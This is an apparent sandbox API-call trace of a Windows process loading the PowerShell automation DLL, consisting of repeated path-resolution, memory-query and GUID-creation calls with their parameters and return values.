	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.451] VirtualQuery (in: lpAddress=0x18c050, lpBuffer=0x18cf10, dwLength=0x30 | out: lpBuffer=0x18cf10*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.451] VirtualQuery (in: lpAddress=0x18c050, lpBuffer=0x18cf10, dwLength=0x30 | out: lpBuffer=0x18cf10*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.452] VirtualQuery (in: lpAddress=0x18b740, lpBuffer=0x18c600, dwLength=0x30 | out: lpBuffer=0x18c600*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.452] VirtualQuery (in: lpAddress=0x18b7d0, lpBuffer=0x18c690, dwLength=0x30 | out: lpBuffer=0x18c690*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.452] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.452] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.463] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.463] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.463] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.463] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.464] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.464] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.464] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.464] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.464] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.464] VirtualQuery (in: lpAddress=0x18bb80, lpBuffer=0x18ca40, dwLength=0x30 | out: lpBuffer=0x18ca40*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.464] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.464] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.465] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.465] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.465] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xf0af5b5e, Data2=0x7efd, Data3=0x4916, Data4=([0]=0x86, [1]=0x47, [2]=0x86, [3]=0xad, [4]=0x9a, [5]=0xaf, [6]=0x44, [7]=0x35))) returned 0x0
	[0427.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.468] VirtualQuery (in: lpAddress=0x18b740, lpBuffer=0x18c600, dwLength=0x30 | out: lpBuffer=0x18c600*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.468] VirtualQuery (in: lpAddress=0x18b7d0, lpBuffer=0x18c690, dwLength=0x30 | out: lpBuffer=0x18c690*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.469] VirtualQuery (in: lpAddress=0x18b9f0, lpBuffer=0x18c8b0, dwLength=0x30 | out: lpBuffer=0x18c8b0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0427.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.469] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xf8b64040, Data2=0x14f9, Data3=0x4395, Data4=([0]=0xa0, [1]=0x51, [2]=0x0, [3]=0x67, [4]=0xe7, [5]=0xbf, [6]=0xe7, [7]=0x8f))) returned 0x0
	[0427.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
